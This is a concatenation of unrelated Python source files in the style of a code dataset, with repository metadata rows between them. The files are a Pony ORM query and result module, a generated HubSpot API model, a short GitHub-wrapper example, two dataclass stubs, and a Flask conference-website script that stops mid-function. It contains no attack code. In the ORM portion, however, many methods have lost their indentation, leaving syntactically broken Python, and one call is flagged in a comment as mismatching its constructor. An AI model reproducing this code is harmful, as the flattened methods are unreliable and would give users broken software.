        Accepts None (drop ordering), a lambda or its text, a RawSQL object,
        1-based column numbers, or attributes / desc() wrappers.
        """
        if not args: throw(TypeError, '%s() method requires at least one argument' % method_name)
        if args[0] is None:
            if len(args) > 1: throw(TypeError, 'When first argument of %s() method is None, it must be the only argument' % method_name)
            tup = (('without_order',),)
            new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
            new_filters = query._filters + tup
            new_translator, new_vars = query._get_translator(new_key, query._vars)
            if new_translator is None:
                new_translator = query._translator.without_order()
                query._database._translator_cache[new_key] = new_translator
            return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator)
        if isinstance(args[0], (basestring, types.FunctionType)):
            func, globals, locals = get_globals_and_locals(args, kwargs=None, frame_depth=cut_traceback_depth+2)
            return query._process_lambda(func, globals, locals, order_by=True)
        if isinstance(args[0], RawSQL):
            raw = args[0]
            return query.order_by(lambda: raw)
        # remaining args must be either all column numbers or all attributes
        attributes = numbers = False
        for arg in args:
            if isinstance(arg, int_types): numbers = True
            elif isinstance(arg, (Attribute, DescWrapper)): attributes = True
            else: throw(TypeError, "order_by() method receive an argument of invalid type: %r" % arg)
        if numbers and attributes:
            throw(TypeError, 'order_by() method receive invalid combination of arguments')
        tup = (('order_by_numbers' if numbers else 'order_by_attributes', args),)
        new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
        new_filters = query._filters + tup
        new_translator, new_vars = query._get_translator(new_key, query._vars)
        if new_translator is None:
            if numbers: new_translator = query._translator.order_by_numbers(args)
            else: new_translator = query._translator.order_by_attributes(args)
            query._database._translator_cache[new_key] = new_translator
        return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator)
    def _process_lambda(query, func, globals, locals, order_by=False, original_names=False):
        """Apply a lambda (or its text source) as an ORDER BY or filter step.

        order_by selects ordering vs filtering; original_names controls
        whether lambda arguments refer to original query variables or to the
        SELECT result columns.  Returns a refined clone of the query.
        """
        prev_translator = query._translator
        argnames = ()
        if isinstance(func, basestring):
            func_id = func
            func_ast = string2ast(func)
            if isinstance(func_ast, ast.Lambda):
                argnames = get_lambda_args(func_ast)
                func_ast = func_ast.code
            cells = None
        elif type(func) is types.FunctionType:
            argnames = get_lambda_args(func)
            func_id = id(func.func_code if PY2 else func.__code__)
            func_ast, external_names, cells = decompile(func)
        elif not order_by: throw(TypeError,
            'Argument of filter() method must be a lambda functon or its text. Got: %r' % func)
        else: assert False  # pragma: no cover
        if argnames:
            if original_names:
                # lambda arguments must name variables of the original query
                for name in argnames:
                    if name not in prev_translator.namespace: throw(TypeError,
                        'Lambda argument `%s` does not correspond to any variable in original query' % name)
            else:
                expr_type = prev_translator.expr_type
                expr_count = len(expr_type) if type(expr_type) is tuple else 1
                if len(argnames) != expr_count:
                    throw(TypeError, 'Incorrect number of lambda arguments. '
                                     'Expected: %d, got: %d' % (expr_count, len(argnames)))
        else:
            original_names = True
        new_filter_num = query._filter_num + 1
        func_ast, extractors = create_extractors(
            func_id, func_ast, globals, locals, special_functions, const_functions, argnames or prev_translator.namespace)
        if extractors:
            vars, vartypes = extract_vars(func_id, new_filter_num, extractors, globals, locals, cells)
            query._database.provider.normalize_vars(vars, vartypes)
            new_vars = query._vars.copy()
            new_vars.update(vars)
        else: new_vars, vartypes = query._vars, HashableDict()
        tup = (('order_by' if order_by else 'where' if original_names else 'filter', func_id, vartypes),)
        new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
        new_filters = query._filters + (('apply_lambda', func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, None, vartypes),)
        new_translator, new_vars = query._get_translator(new_key, new_vars)
        if new_translator is None:
            prev_optimized = prev_translator.optimize
            new_translator = prev_translator.apply_lambda(func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, new_vars, vartypes)
            if not prev_optimized:
                name_path = new_translator.can_be_optimized()
                if name_path:
                    # rebuild from the pickled original tree with the LEFT JOIN
                    # optimization, then replay all recorded filter steps
                    tree_copy = unpickle_ast(prev_translator.pickled_tree) # tree = deepcopy(tree)
                    translator_cls = prev_translator.__class__
                    try:
                        new_translator = translator_cls(
                            tree_copy, None, prev_translator.original_code_key, prev_translator.original_filter_num,
                            prev_translator.extractors, None, prev_translator.vartypes.copy(),
                            left_join=True, optimize=name_path)
                    except UseAnotherTranslator:
                        assert False
                    new_translator = query._reapply_filters(new_translator)
                    new_translator = new_translator.apply_lambda(func_id, new_filter_num, order_by, func_ast, argnames, original_names, extractors, new_vars, vartypes)
            query._database._translator_cache[new_key] = new_translator
        return query._clone(_filter_num=new_filter_num, _vars=new_vars, _key=new_key, _filters=new_filters,
                            _translator=new_translator)
def _reapply_filters(query, translator):
for tup in query._filters:
method_name, args = tup[0], tup[1:]
translator_method = getattr(translator, method_name)
translator = translator_method(*args)
return translator
    @cut_traceback
    def filter(query, *args, **kwargs):
        """Refine the query with a lambda (arguments refer to the SELECT
        result) or with attribute=value keyword filters (entity queries only)."""
        if args:
            if isinstance(args[0], RawSQL):
                raw = args[0]
                return query.filter(lambda: raw)
            func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth=cut_traceback_depth+1)
            return query._process_lambda(func, globals, locals, order_by=False)
        if not kwargs: return query
        entity = query._translator.expr_type
        if not isinstance(entity, EntityMeta): throw(TypeError,
            'Keyword arguments are not allowed: since query result type is not an entity, filter() method can accept only lambda')
        return query._apply_kwargs(kwargs)
    @cut_traceback
    def where(query, *args, **kwargs):
        """Like filter(), but lambda arguments refer to the original query
        variables rather than to the SELECT result columns."""
        if args:
            if isinstance(args[0], RawSQL):
                raw = args[0]
                return query.where(lambda: raw)
            func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth=cut_traceback_depth+1)
            return query._process_lambda(func, globals, locals, order_by=False, original_names=True)
        if not kwargs: return query
        if len(query._translator.tree.quals) > 1: throw(TypeError,
            'Keyword arguments are not allowed: query iterates over more than one entity')
        return query._apply_kwargs(kwargs, original_names=True)
    def _apply_kwargs(query, kwargs, original_names=False):
        """Turn attribute=value keyword arguments into equality filters.

        With original_names=True the attributes belong to the entity the
        query iterates over; otherwise to the entity of the SELECT result.
        """
        translator = query._translator
        if original_names:
            # resolve the entity from the generator's iteration variable
            tablerefs = translator.sqlquery.tablerefs
            alias = translator.tree.quals[0].assign.name
            tableref = tablerefs[alias]
            entity = tableref.entity
        else:
            entity = translator.expr_type
        get_attr = entity._adict_.get
        filterattrs = []
        value_dict = {}
        next_id = query._next_kwarg_id
        # sorted for a deterministic cache key regardless of kwargs order
        for attrname, val in sorted(iteritems(kwargs)):
            attr = get_attr(attrname)
            if attr is None: throw(AttributeError,
                'Entity %s does not have attribute %s' % (entity.__name__, attrname))
            if attr.is_collection: throw(TypeError,
                '%s attribute %s cannot be used as a keyword argument for filtering'
                % (attr.__class__.__name__, attr))
            val = attr.validate(val, None, entity, from_db=False)
            id = next_id
            next_id += 1
            filterattrs.append((attr, id, val is None))
            value_dict[id] = val
        filterattrs = tuple(filterattrs)
        tup = (('apply_kwfilters', filterattrs, original_names),)
        new_key = HashableDict(query._key, filters=query._key['filters'] + tup)
        new_filters = query._filters + tup
        new_vars = query._vars.copy()
        new_vars.update(value_dict)
        new_translator, new_vars = query._get_translator(new_key, new_vars)
        if new_translator is None:
            new_translator = translator.apply_kwfilters(filterattrs, original_names)
            query._database._translator_cache[new_key] = new_translator
        return query._clone(_key=new_key, _filters=new_filters, _translator=new_translator,
                            _next_kwarg_id=next_id, _vars=new_vars)
@cut_traceback
def __getitem__(query, key):
if not isinstance(key, slice):
throw(TypeError, 'If you want apply index to a query, convert it to list first')
step = key.step
if step is not None and step != 1: throw(TypeError, "Parameter 'step' of slice object is not allowed here")
start = key.start
if start is None: start = 0
elif start < 0: throw(TypeError, "Parameter 'start' of slice object cannot be negative")
stop = key.stop
if stop is None:
if not start:
return query._fetch()
else:
return query._fetch(limit=None, offset=start)
if start >= stop:
return query._fetch(limit=0)
return query._fetch(limit=stop-start, offset=start)
def _fetch(query, limit=None, offset=None, lazy=False):
return QueryResult(query, limit, offset, lazy=lazy)
@cut_traceback
def fetch(query, limit=None, offset=None):
return query._fetch(limit, offset)
@cut_traceback
def limit(query, limit=None, offset=None):
return query._fetch(limit, offset, lazy=True)
@cut_traceback
def page(query, pagenum, pagesize=10):
offset = (pagenum - 1) * pagesize
return query._fetch(pagesize, offset, lazy=True)
    def _aggregate(query, aggr_func_name, distinct=None, sep=None):
        """Execute the query as a single-value aggregate (SUM/AVG/MIN/...).

        The raw backend value is converted to a Python type appropriate for
        the aggregate; SUM over an empty set yields 0 instead of None.
        """
        translator = query._translator
        sql, arguments, attr_offsets, query_key = query._construct_sql_and_arguments(
            aggr_func_name=aggr_func_name, aggr_func_distinct=distinct, sep=sep)
        cache = query._database._get_cache()
        try: result = cache.query_results[query_key]
        except KeyError:
            cursor = query._database._exec_sql(sql, arguments)
            row = cursor.fetchone()
            if row is not None: result = row[0]
            else: result = None
            if result is None and aggr_func_name == 'SUM': result = 0
            if result is None: pass
            elif aggr_func_name == 'COUNT': pass
            else:
                # convert via the type converter matching the aggregate's result
                if aggr_func_name == 'AVG':
                    expr_type = float
                elif aggr_func_name == 'GROUP_CONCAT':
                    expr_type = basestring
                else:
                    expr_type = translator.expr_type
                provider = query._database.provider
                converter = provider.get_converter_by_py_type(expr_type)
                result = converter.sql2py(result)
            if query_key is not None: cache.query_results[query_key] = result
        return result
@cut_traceback
def sum(query, distinct=None):
return query._aggregate('SUM', distinct)
@cut_traceback
def avg(query, distinct=None):
return query._aggregate('AVG', distinct)
@cut_traceback
def group_concat(query, sep=None, distinct=None):
if sep is not None:
if not isinstance(sep, basestring):
throw(TypeError, '`sep` option for `group_concat` should be of type str. Got: %s' % type(sep).__name__)
return query._aggregate('GROUP_CONCAT', distinct, sep)
@cut_traceback
def min(query):
return query._aggregate('MIN')
@cut_traceback
def max(query):
return query._aggregate('MAX')
@cut_traceback
def count(query, distinct=None):
return query._aggregate('COUNT', distinct)
@cut_traceback
def for_update(query, nowait=False):
provider = query._database.provider
if nowait and not provider.select_for_update_nowait_syntax: throw(TranslationError,
'%s provider does not support SELECT FOR UPDATE NOWAIT syntax' % provider.dialect)
return query._clone(_for_update=True, _nowait=nowait)
def random(query, limit):
return query.order_by('random()')[:limit]
def to_json(query, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
return query._database.to_json(query[:], include, exclude, converter, with_schema, schema_hash)
def strcut(s, width):
    """Fit string s into exactly `width` characters: pad short strings with
    spaces, truncate long ones with a trailing '...'."""
    if len(s) > width:
        return s[:width - 3] + '...'
    return s.ljust(width)
class QueryResultIterator(object):
    """Iterator over a QueryResult; a lazy result is fetched on first next()."""
    __slots__ = '_query_result', '_position'
    def __init__(self, query_result):
        self._query_result = query_result
        self._position = 0
    def _get_type_(self):
        # a partially consumed iterator cannot be reused as a query parameter
        if self._position != 0:
            throw(NotImplementedError, 'Cannot use partially exhausted iterator, please convert to list')
        return self._query_result._get_type_()
    def _normalize_var(self, query_type):
        if self._position != 0: throw(NotImplementedError)
        return self._query_result._normalize_var(query_type)
    def next(self):
        qr = self._query_result
        if qr._items is None:
            # lazy QueryResult: materialize on first advance
            qr._items = qr._query._actual_fetch(qr._limit, qr._offset)
        if self._position >= len(qr._items):
            raise StopIteration
        item = qr._items[self._position]
        self._position += 1
        return item
    __next__ = next
    def __length_hint__(self):
        return len(self._query_result) - self._position
def make_query_result_method_error_stub(name, title=None):
    """Build a stand-in method that rejects list-style mutation of a QueryResult.

    The returned callable always raises TypeError, telling the user to cast
    the QueryResult to a plain list first; `title` (falling back to `name`)
    names the rejected operation in the message.
    """
    message = 'In order to do %s, cast QueryResult to list first' % (title or name)
    def func(self, *args, **kwargs):
        throw(TypeError, message)
    return func
class QueryResult(object):
    """List-like view over the rows produced by a Query.

    The result may be lazy: `_items` stays None until something forces a
    fetch, at which point `_actual_fetch` runs the SQL and caches the rows.
    Mutating list methods that make no sense on a query result are replaced
    by stubs that tell the user to cast to a list first.
    """
    __slots__ = '_query', '_limit', '_offset', '_items', '_expr_type', '_col_names'
    def __init__(self, query, limit, offset, lazy):
        translator = query._translator
        self._query = query
        self._limit = limit
        self._offset = offset
        # Lazy results defer the database round-trip until first access.
        self._items = None if lazy else self._query._actual_fetch(limit, offset)
        self._expr_type = translator.expr_type
        self._col_names = translator.col_names
    def _get_type_(self):
        # Translator support: an unfetched result is typed by its query,
        # a fetched one by the per-item expression type.
        if self._items is None:
            return QueryType(self._query, self._limit, self._offset)
        item_type = self._query._translator.expr_type
        return tuple(item_type for item in self._items)
    def _normalize_var(self, query_type):
        # Used when this result is passed as a parameter into another query.
        if self._items is None:
            return query_type, self._query
        items = tuple(normalize(item) for item in self._items)
        item_type = self._query._translator.expr_type
        return tuple(item_type for item in items), items
    def _get_items(self):
        # Force the fetch (if still lazy) and return the cached row list.
        if self._items is None:
            self._items = self._query._actual_fetch(self._limit, self._offset)
        return self._items
    def __getstate__(self):
        # Pickling forces a fetch; the query object itself is not serialized.
        return self._get_items(), self._limit, self._offset, self._expr_type, self._col_names
    def __setstate__(self, state):
        self._query = None
        self._items, self._limit, self._offset, self._expr_type, self._col_names = state
    def __repr__(self):
        if self._items is not None:
            return self.__str__()
        # Avoid triggering a database query just to build a repr.
        return '<Lazy QueryResult object at %s>' % hex(id(self))
    def __str__(self):
        return repr(self._get_items())
    def __iter__(self):
        return QueryResultIterator(self)
    def __len__(self):
        if self._items is None:
            self._items = self._query._actual_fetch(self._limit, self._offset)
        return len(self._items)
    def __getitem__(self, key):
        if self._items is None:
            self._items = self._query._actual_fetch(self._limit, self._offset)
        return self._items[key]
    def __contains__(self, item):
        return item in self._get_items()
    def index(self, item):
        return self._get_items().index(item)
    def _other_items(self, other):
        # Comparisons accept both plain sequences and other QueryResults.
        return other._get_items() if isinstance(other, QueryResult) else other
    def __eq__(self, other):
        return self._get_items() == self._other_items(other)
    def __ne__(self, other):
        return self._get_items() != self._other_items(other)
    def __lt__(self, other):
        return self._get_items() < self._other_items(other)
    def __le__(self, other):
        return self._get_items() <= self._other_items(other)
    def __gt__(self, other):
        return self._get_items() > self._other_items(other)
    def __ge__(self, other):
        return self._get_items() >= self._other_items(other)
    def __reversed__(self):
        return reversed(self._get_items())
    def reverse(self):
        # In-place operations act on the cached list, mirroring the list API.
        self._get_items().reverse()
    def sort(self, *args, **kwargs):
        self._get_items().sort(*args, **kwargs)
    def shuffle(self):
        shuffle(self._get_items())
    @cut_traceback
    def show(self, width=None):
        """Pretty-print the rows as a fixed-width text table."""
        if self._items is None:
            self._items = self._query._actual_fetch(self._limit, self._offset)
        if not width: width = options.CONSOLE_WIDTH
        max_columns = width // 5  # each column needs at least ~5 characters
        expr_type = self._expr_type
        col_names = self._col_names
        def to_str(x):
            return tostring(x).replace('\n', ' ')
        if isinstance(expr_type, EntityMeta):
            # Entity rows: one column per non-lazy, non-collection attribute.
            entity = expr_type
            col_names = [ attr.name for attr in entity._attrs_
                          if not attr.is_collection and not attr.lazy ][:max_columns]
            if len(col_names) == 1:
                col_name = col_names[0]
                row_maker = lambda obj: (getattr(obj, col_name),)
            else: row_maker = attrgetter(*col_names)
            rows = [tuple(to_str(value) for value in row_maker(obj)) for obj in self._items]
        elif len(col_names) == 1:
            rows = [(to_str(obj),) for obj in self._items]
        else:
            rows = [tuple(to_str(value) for value in row) for row in self._items]
        # Natural width of each column: widest of header and cell contents.
        remaining_columns = {}
        for col_num, colname in enumerate(col_names):
            if not rows: max_len = len(colname)
            else: max_len = max(len(colname), max(len(row[col_num]) for row in rows))
            remaining_columns[col_num] = max_len
        width_dict = {}
        available_width = width - len(col_names) + 1  # minus '|' separators
        # Greedily fix columns that already fit within an equal share, then
        # split the leftover width evenly among the wider remaining columns.
        while remaining_columns:
            base_len = (available_width - len(remaining_columns) + 1) // len(remaining_columns)
            for col_num, max_len in remaining_columns.items():
                if max_len <= base_len:
                    width_dict[col_num] = max_len
                    # Deleting during iteration is safe only because we break
                    # immediately — the iterator is never advanced again.
                    del remaining_columns[col_num]
                    available_width -= max_len
                    break
            else: break
        if remaining_columns:
            base_len = available_width // len(remaining_columns)
            for col_num, max_len in remaining_columns.items():
                width_dict[col_num] = base_len
        print(strjoin('|', (strcut(colname, width_dict[i]) for i, colname in enumerate(col_names))))
        print(strjoin('+', ('-' * width_dict[i] for i in xrange(len(col_names)))))
        for row in rows:
            print(strjoin('|', (strcut(item, width_dict[i]) for i, item in enumerate(row))))
    def to_json(self, include=(), exclude=(), converter=None, with_schema=True, schema_hash=None):
        """Serialize the fetched result via the database's to_json helper."""
        return self._query._database.to_json(self, include, exclude, converter, with_schema, schema_hash)
    def __add__(self, other):
        # Concatenation escapes the QueryResult type and yields a plain list.
        result = []
        result.extend(self)
        result.extend(other)
        return result
    def __radd__(self, other):
        result = []
        result.extend(other)
        result.extend(self)
        return result
    def to_list(self):
        return list(self)
    # Mutating list methods are intentionally unsupported; each stub raises
    # TypeError directing the user to cast the result to a list first.
    __setitem__ = make_query_result_method_error_stub('__setitem__', 'item assignment')
    __delitem__ = make_query_result_method_error_stub('__delitem__', 'item deletion')
    __iadd__ = make_query_result_method_error_stub('__iadd__', '+=')
    __imul__ = make_query_result_method_error_stub('__imul__', '*=')
    __mul__ = make_query_result_method_error_stub('__mul__', '*')
    __rmul__ = make_query_result_method_error_stub('__rmul__', '*')
    append = make_query_result_method_error_stub('append', 'append')
    clear = make_query_result_method_error_stub('clear', 'clear')
    extend = make_query_result_method_error_stub('extend', 'extend')
    insert = make_query_result_method_error_stub('insert', 'insert')
    pop = make_query_result_method_error_stub('pop', 'pop')
    remove = make_query_result_method_error_stub('remove', 'remove')
@cut_traceback
def show(entity):
    """Print a human-readable description of `entity`.

    Accepts an entity class, an entity instance, a query source (string or
    generator), anything exposing a .show() method, or falls back to pprint.
    """
    x = entity
    if isinstance(x, EntityMeta):
        print(x.describe())
    elif isinstance(x, Entity):
        print('instance of ' + x.__class__.__name__)
        # width = options.CONSOLE_WIDTH
        # for attr in x._attrs_:
        #     if attr.is_collection or attr.lazy: continue
        #     value = str(attr.__get__(x)).replace('\n', ' ')
        #     print('  %s: %s' % (attr.name, strcut(value, width-len(attr.name)-4)))
        # print()
        # NOTE(review): QueryResult.__init__ above is (query, limit, offset,
        # lazy), but this call passes a list and a class — it looks like it
        # predates a signature change. Confirm against the current API.
        QueryResult([ x ], None, x.__class__, None).show()
    elif isinstance(x, (basestring, types.GeneratorType)):
        select(x).show()
    elif hasattr(x, 'show'):
        x.show()
    else:
        from pprint import pprint
        pprint(x)
# Callables that receive special handling when encountered inside a query.
special_functions = {itertools.count, utils.count, count, random, raw_sql, getattr}
# Callables whose results are treated as constant values during translation.
const_functions = {buffer, Decimal, datetime.datetime, datetime.date, datetime.time, datetime.timedelta}
| 47.599578 | 167 | 0.606485 |
8a46493a938e0618ecff299c0ec1ffec1afbe029 | 3,586 | py | Python | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 117 | 2020-04-06T08:22:53.000Z | 2022-03-18T03:41:29.000Z | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 62 | 2020-04-06T16:21:06.000Z | 2022-03-17T16:50:44.000Z | hubspot/crm/deals/models/batch_input_simple_public_object_batch_input.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 45 | 2020-04-06T16:13:52.000Z | 2022-03-30T21:33:17.000Z | # coding: utf-8
"""
Deals
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from hubspot.crm.deals.configuration import Configuration
class BatchInputSimplePublicObjectBatchInput(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech
    Do not edit the class manually.
    """
    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Declared OpenAPI type for each model attribute.
    openapi_types = {"inputs": "list[SimplePublicObjectBatchInput]"}
    # Python attribute name -> JSON field name.
    attribute_map = {"inputs": "inputs"}
    def __init__(self, inputs=None, local_vars_configuration=None):  # noqa: E501
        """BatchInputSimplePublicObjectBatchInput - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration
        self._inputs = None
        self.discriminator = None
        # Assigned through the property below so validation runs.
        self.inputs = inputs
    @property
    def inputs(self):
        """Gets the inputs of this BatchInputSimplePublicObjectBatchInput.  # noqa: E501
        :return: The inputs of this BatchInputSimplePublicObjectBatchInput.  # noqa: E501
        :rtype: list[SimplePublicObjectBatchInput]
        """
        return self._inputs
    @inputs.setter
    def inputs(self, inputs):
        """Sets the inputs of this BatchInputSimplePublicObjectBatchInput.
        :param inputs: The inputs of this BatchInputSimplePublicObjectBatchInput.  # noqa: E501
        :type: list[SimplePublicObjectBatchInput]
        """
        # Client-side validation (when enabled) treats `inputs` as required.
        if self.local_vars_configuration.client_side_validation and inputs is None:  # noqa: E501
            raise ValueError("Invalid value for `inputs`, must not be `None`")  # noqa: E501
        self._inputs = inputs
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        # Recursively convert nested models (anything with to_dict) as well.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items()))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, BatchInputSimplePublicObjectBatchInput):
            return False
        return self.to_dict() == other.to_dict()
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, BatchInputSimplePublicObjectBatchInput):
            return True
        return self.to_dict() != other.to_dict()
| 32.306306 | 139 | 0.639431 |
0899c56fcd78917a82681bf56f5fb1875b043b6d | 177 | py | Python | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | examples/iterator.py | calind/zipa | d2f3572454456aafe952a911b4881f4862b3730c | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# vim: ft=python:sw=4:ts=4:sts=4:et:
from zipa import api_github_com as github
# Attribute access on the zipa wrapper lazily builds the API path
# /orgs/django/repos; iterating the object performs the HTTP request and
# yields repository resources.
repos = github.orgs.django.repos
# Python 2 print statement: this example predates Python 3 support.
for repo in repos:
    print repo.name
| 19.666667 | 41 | 0.689266 |
eac17946bd39b43439cf1781e5b516f51b25a3b4 | 179 | py | Python | src/aiohttp_micro/core/entities.py | clayman083/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | 1 | 2019-11-04T12:15:39.000Z | 2019-11-04T12:15:39.000Z | src/aiohttp_micro/core/entities.py | clayman74/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | null | null | null | src/aiohttp_micro/core/entities.py | clayman74/aiohttp-micro | 0d183f11a03beb0a51357eb4ad6134ce01e347a4 | [
"MIT"
] | 1 | 2021-11-16T15:24:44.000Z | 2021-11-16T15:24:44.000Z | from dataclasses import dataclass
@dataclass
class Entity:
    # Primary identifier of a persisted entity.
    key: int
@dataclass
class Payload:
    # Marker base class for request/response payloads; carries no fields.
    pass
@dataclass
class Filters:
    # Pagination window for list queries.
    limit: int = 10  # maximum number of items to return
    offset: int = 0  # number of items to skip from the start
| 9.944444 | 33 | 0.681564 |
d4dafa990fc14a5251e375aadfdd5ad69d1d1ccd | 8,604 | py | Python | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | main.py | bguedj/COLT-2020 | 7ee74b79fe1db8118438fb780a9e4babd8ec6590 | [
"MIT"
] | null | null | null | # pylint: disable=global-statement,redefined-outer-name
import argparse
import csv
import glob
import json
import os
import yaml
from flask import Flask, jsonify, redirect, render_template, send_from_directory
from flask_frozen import Freezer
from flaskext.markdown import Markdown
site_data = {}
by_uid = {}
def main(site_data_path):
    """Load every data file under *site_data_path* into the global caches.

    Populates ``site_data`` (keyed by file stem) and ``by_uid`` (keyed by
    record "UID" for the collections listed below), and returns the list
    of files Flask should watch for auto-reloading.
    """
    global site_data, extra_files
    extra_files = ["README.md"]
    # Load all for your sitedata one time.
    for f in glob.glob(site_data_path + "/*"):
        extra_files.append(f)
        # rsplit keeps dotted stems like "a.b.json" intact (a bare
        # split(".") would raise ValueError on them).
        name, typ = f.split("/")[-1].rsplit(".", 1)
        # Context managers close the files (the previous json.load(open(f))
        # pattern leaked file handles).
        if typ == "json":
            with open(f) as fh:
                site_data[name] = json.load(fh)
        elif typ in {"csv", "tsv"}:
            with open(f) as fh:
                site_data[name] = list(csv.DictReader(fh))
        elif typ == "yml":
            with open(f) as fh:
                site_data[name] = yaml.load(fh.read(), Loader=yaml.SafeLoader)
    # Index the record-based collections by their UID for O(1) page lookups.
    for typ in ["papers", "speakers", "open_problems", "pdfs"]:
        by_uid[typ] = {}
        for p in site_data[typ]:
            by_uid[typ][p["UID"]] = p
    print("Data Successfully Loaded")
    return extra_files
# ------------- SERVER CODE -------------------->
app = Flask(__name__)
app.config.from_object(__name__)
freezer = Freezer(app)
markdown = Markdown(app)
# MAIN PAGES
def _data():
    """Base template context shared by every page (just the site config)."""
    return {"config": site_data["config"]}
@app.route("/")
def index():
return redirect("/schedule.html")
# TOP LEVEL PAGES
# @app.route("/index.html")
# def home():
# data = _data()
# data["readme"] = open("README.md").read()
# data["committee"] = site_data["committee"]["committee"]
# return render_template("index.html", **data)
#@app.route("/about.html")
#def about():
# data = _data()
# data["FAQ"] = site_data["faq"]["FAQ"]
# return render_template("about.html", **data)
@app.route("/papers.html")
def papers():
data = _data()
data["zoom"] = site_data["zoom"]
# data["papers"] = site_data["papers"]
return render_template("papers.html", **data)
#@app.route("/paper_vis.html")
#def paper_vis():
# data = _data()
# return render_template("papers_vis.html", **data)
@app.route("/schedule.html")
def schedule():
data = _data()
data["zoom"] = site_data["zoom"]
data["day"] = {
"speakers": site_data["speakers"],
# "highlighted": [
# format_paper(by_uid["papers"][h["UID"]]) for h in site_data["highlighted"]
# ],
}
return render_template("schedule.html", **data)
@app.route("/keynotes.html")
def keynotes():
data = _data()
data["zoom"] = site_data["zoom"]
data["day"] = {
"speakers": site_data["speakers"],
}
return render_template("keynotes.html", **data)
@app.route("/format.html")
def conference_format():
data = _data()
data["zoom"] = site_data["zoom"]
return render_template("format.html", **data)
@app.route("/news.html")
def news():
data = _data()
return render_template("news.html", **data)
#@app.route("/subject_areas.html")
#def subject_areas():
# data = _data()
# return render_template("subject_areas.html", **data)
@app.route("/plain.html")
def plain():
data = _data()
return render_template("plain.html", **data)
#@app.route("/workshops.html")
#def workshops():
# data = _data()
# data["workshops"] = [
# format_workshop(workshop) for workshop in site_data["workshops"]
# ]
# return render_template("workshops.html", **data)
def extract_list_field(v, key):
    """Return v[key] as a list.

    Lists pass through unchanged; any other value is treated as a
    '|'-separated string (a missing key therefore yields ['']).
    """
    value = v.get(key, "")
    return value if isinstance(value, list) else value.split("|")
def format_paper(v):
    """Shape a raw paper record into the nested dict the templates and the
    papers.json endpoint expect; '|'-separated fields become lists."""
    list_keys = ["authors", "keywords", "session"]
    list_fields = {}
    for key in list_keys:
        list_fields[key] = extract_list_field(v, key)
    return {
        "id": v["UID"],
        "forum": v["UID"],
        "content": {
            "title": v["title"],
            "authors": list_fields["authors"],
            "keywords": list_fields["keywords"],
            "abstract": v["abstract"],
            "TLDR": v["abstract"],
            "recs": [],
            "session": list_fields["session"],
            "pdf_url": v.get("pdf_url", ""),
            "slideslive_1": v["slideslive_1"],
            "slideslive_2": v["slideslive_2"],
            "zoom": [v["zoom_1"], v["zoom_2"]],
            "positions": [v["position_1"], v["position_2"]],
        },
    }
def format_open_problem(v):
    """Shape a raw open-problem record like a paper so both share templates.

    Keywords and session are fixed placeholders that tag the record as an
    open problem.
    """
    list_keys = ["authors"]
    list_fields = {}
    for key in list_keys:
        list_fields[key] = extract_list_field(v, key)
    return {
        "id": v["UID"],
        "content": {
            "title": v["title"],
            "authors": list_fields["authors"],
            "pdf_url": v.get("pdf_url", ""),
            "slideslive": v["slideslive"],
            "keywords": ["Open problem"],
            "session": ["Session OP"],
            "positions": [v["position"]],
            "zoom": 0,
        },
    }
def format_workshop(v):
    """Shape a raw workshop record for the workshop templates."""
    organizers = extract_list_field(v, "authors")
    return {
        "id": v["UID"],
        "title": v["title"],
        "organizers": organizers,
        "abstract": v["abstract"],
    }
# ITEM PAGES
@app.route("/papers/paper_<poster>.html")
def poster(poster):
uid = poster
data = _data()
if 'OP' in uid:
v = by_uid["open_problems"][uid]
